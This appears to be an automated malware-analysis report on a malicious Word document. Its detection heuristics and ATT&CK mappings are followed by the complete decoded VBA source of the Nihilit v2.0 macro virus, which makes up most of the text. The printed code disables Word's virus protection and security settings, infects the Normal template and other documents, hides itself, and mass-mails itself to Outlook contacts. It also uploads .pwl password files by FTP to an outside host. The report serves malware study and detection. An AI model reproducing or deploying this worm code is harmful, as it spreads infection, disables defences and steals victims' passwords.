MALICIOUS
458
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
T1204.002 Malicious File
The sample is a malicious Microsoft Word document containing VBA macros. The AutoClose macro executes a function that attempts to disable security features, export a component to C:\Windows\Nihilit.drv, save it as C:\Windows\Nihilit.doc, and then attempts to use Outlook to send itself via email. This indicates a downloader or worm-like behavior, likely delivered as a spearphishing attachment.
Heuristics 11
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
shell "ftp http://members.tripod.com/Nihilit/" -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATIONVBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.Matched line in script
Set Ni_msg = Ni_OApp.CreateItem(0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Ni_OApp = CreateObject("Outlook.Application") -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://m(emb�x.�Cpo�d.�d/� In document text (OLE body)
- http://members.tripod.com/Nihilit/A@�In document text (OLE body)
- http://members.tripod.com/Nihilit/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6973 bytes |
SHA-256: 0f8ef990e8a6eddef38d037b391718d417b8b918eaab5bc1184db2e983ee45fb |
|||
|
Detection
ClamAV:
Doc.Trojan.Hilite-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modulo1"
Sub AutoClose()
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
' Nihilit v2.0 by Necronomikon |[ShadowvX],[Devilport-Systems]
' thanks WalruS for code and help
Call Nihilit
End Sub
Sub Nihilit()
On Error Resume Next
With Options
.VirusProtection = False
.ConfirmConversions = False
.SaveNormalPrompt = False
End With
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ActiveDocument.ReadOnlyRecommended = False
If NormalTemplate.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then
ActiveDocument.VBProject.VBComponents("Nihilit").Export ("C:\Windows\Nihilit.drv")
SetAttr "C:\Windows\Nihilit.drv", 6
End If
ActiveDocument.SaveAs FileName:="C:\Windows\Nihilit.doc", FileFormat:=wdFormatDocument
Set Ni_OApp = CreateObject("Outlook.Application")
Set Ni_Mapi = Ni_OApp.GetNameSpace("MAPI")
For Each Ni_AddList In Ni_Mapi.AddressLists
Next
If Ni_AddList.AddressEntries.Count <> 0 Then
For Ni_AddListCount = 1 To Ni_AddList.AddressEntries.Count
Next
Set Ni_AddListEntry = Ni_AddList.AddressEntries(Ni_AddListCount)
Set Ni_msg = Ni_OApp.CreateItem(0)
Ni_msg.To = Ni_AddListEntry.Address
Ni_msg.Subject = "Check this!!!"
Ni_msg.Body = "I like this story!!!;o)." + vbCrLf + "Nihilit"
Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc"
Ni_msg.DeleteAfterSubmit = True
If Ni_msg.To <> "" Then
Ni_msg.Send
End If
Call InfectDocument
If Month(Now) = Day(Now) Then Call Pwdstealer
NormalTemplate.Saved = True
End If
End Sub
Sub InfectDocument()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then
ActiveDocument.VBProject.VBComponents.import ("C:\Windows\Nihilit.drv")
ActiveDocument.Save
End If
End Sub
Sub Pwdstealer()
On Error Resume Next
With Application.FileSearch
.FileName = "*.pwl"
.LookIn = "c:"
.Execute
For i = 1 To .FoundFiles.Count
shell "ftp http://members.tripod.com/Nihilit/"
shell "nihilit"
shell "killer"
shell "post" & .FoundFiles(i)
shell "bye"
Next i
End With
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
Sub FileTemplates()
End Sub
Sub ToolsMacro()
Call Stealth
Dialogs(wdDialogToolsMacro).Display
End Sub
Sub ViewVBCode()
Call Stealth
ShowVisualBasicEditor = True
End Sub
Sub Stealth()
On Error Resume Next
Application.OrganizerDelete Source:=NormalTemplate.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
Application.OrganizerDelete Source:=ActiveDocument.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
NormalTemplate.Saved = True
ActiveDocument.Saved = True
End Sub
Sub HelpAbout()
WordBasic.FileNew
WordBasic.ToggleFull
WordBasic.DocMaximize
WordBasic.Font "Comic Sans MS"
WordBasic.FontSize 60
WordBasic.Bold
WordBasic.Insert "Check this!"
WordBasic.StartOfLine
WordBasic.CharRight 1, 1
WordBasic.FormatFont Points:="48", Color:=6
WordBasic.EndOfLine
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 48
WordBasic.Insert "Nihilit was coded by Necronomikon."
End Sub
Sub FileExit()
On Error Resume Next
Call Nihilit
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
End If
Loop
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "h:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "f:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
Application.Quit
End Sub
Sub AutoExit()
On Error Resume Next
Call Nihilit
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
End If
Loop
If ActiveDocument.Saved = False Then ActiveDocument.Save
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "r:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "s:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.